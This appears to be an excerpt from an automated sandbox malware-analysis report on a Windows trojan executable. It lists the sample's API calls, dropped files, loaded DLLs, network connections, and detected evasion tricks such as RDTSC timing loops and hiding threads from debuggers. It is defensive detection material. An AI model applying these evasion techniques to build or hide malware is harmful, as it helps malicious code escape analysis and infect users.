      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:50002 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:50003 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:50007 version: TLS 1.2
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeFile created: C:\Windows\Arder.lnkJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_004069450_2_00406945
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_0040711C0_2_0040711C
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_6E4B1A980_2_6E4B1A98
      Source: dIPYIbWXs1.exeStatic PE information: invalid certificate
      Source: dIPYIbWXs1.exe, 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs dIPYIbWXs1.exe
      Source: dIPYIbWXs1.exe, 00000006.00000000.3910638775.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs dIPYIbWXs1.exe
      Source: dIPYIbWXs1.exeBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs dIPYIbWXs1.exe
      Source: dIPYIbWXs1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal80.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_0040216B LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_0040216B
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeFile created: C:\Users\user\tranchetJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeFile created: C:\Users\user\AppData\Local\Temp\nswC594.tmpJump to behavior
      Source: dIPYIbWXs1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: dIPYIbWXs1.exeReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeFile read: C:\Users\user\Desktop\dIPYIbWXs1.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\dIPYIbWXs1.exe "C:\Users\user\Desktop\dIPYIbWXs1.exe"
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess created: C:\Users\user\Desktop\dIPYIbWXs1.exe "C:\Users\user\Desktop\dIPYIbWXs1.exe"
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess created: C:\Users\user\Desktop\dIPYIbWXs1.exe "C:\Users\user\Desktop\dIPYIbWXs1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Arder.lnk.0.drLNK file: ..\Users\user\Disannex.And37
      Source: dIPYIbWXs1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: dIPYIbWXs1.exe, 00000006.00000001.3911363957.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: dIPYIbWXs1.exe, 00000006.00000001.3911363957.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.3912510121.000000000343F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.4146024960.000000000222F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_6E4B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6E4B1A98
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_6E4B2F60 push eax; ret 0_2_6E4B2F8E
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_028751E7 push edx; iretd 0_2_028751E8
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_028753ED push ss; retf 0_2_028753F8
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_02874547 push esp; retf 0_2_0287454A
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 6_2_01664547 push esp; retf 6_2_0166454A
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 6_2_016651E7 push edx; iretd 6_2_016651E8
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 6_2_016653ED push ss; retf 6_2_016653F8
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeFile created: C:\Users\user\AppData\Local\Temp\nscD2B5.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeAPI/Special instruction interceptor: Address: 3A2490D
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeAPI/Special instruction interceptor: Address: 281490D
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeRDTSC instruction interceptor: First address: 39FE53F second address: 39FE53F instructions: 0x00000000 rdtsc 0x00000002 cmp ax, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F5AC511ACC7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeRDTSC instruction interceptor: First address: 27EE53F second address: 27EE53F instructions: 0x00000000 rdtsc 0x00000002 cmp ax, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F5AC50F7AE7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscD2B5.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.0000000006977000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`E
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeAPI call chain: ExitProcess graph end nodegraph_0-4224
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeAPI call chain: ExitProcess graph end nodegraph_0-4399

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeThread information set: HideFromDebuggerJump to behavior
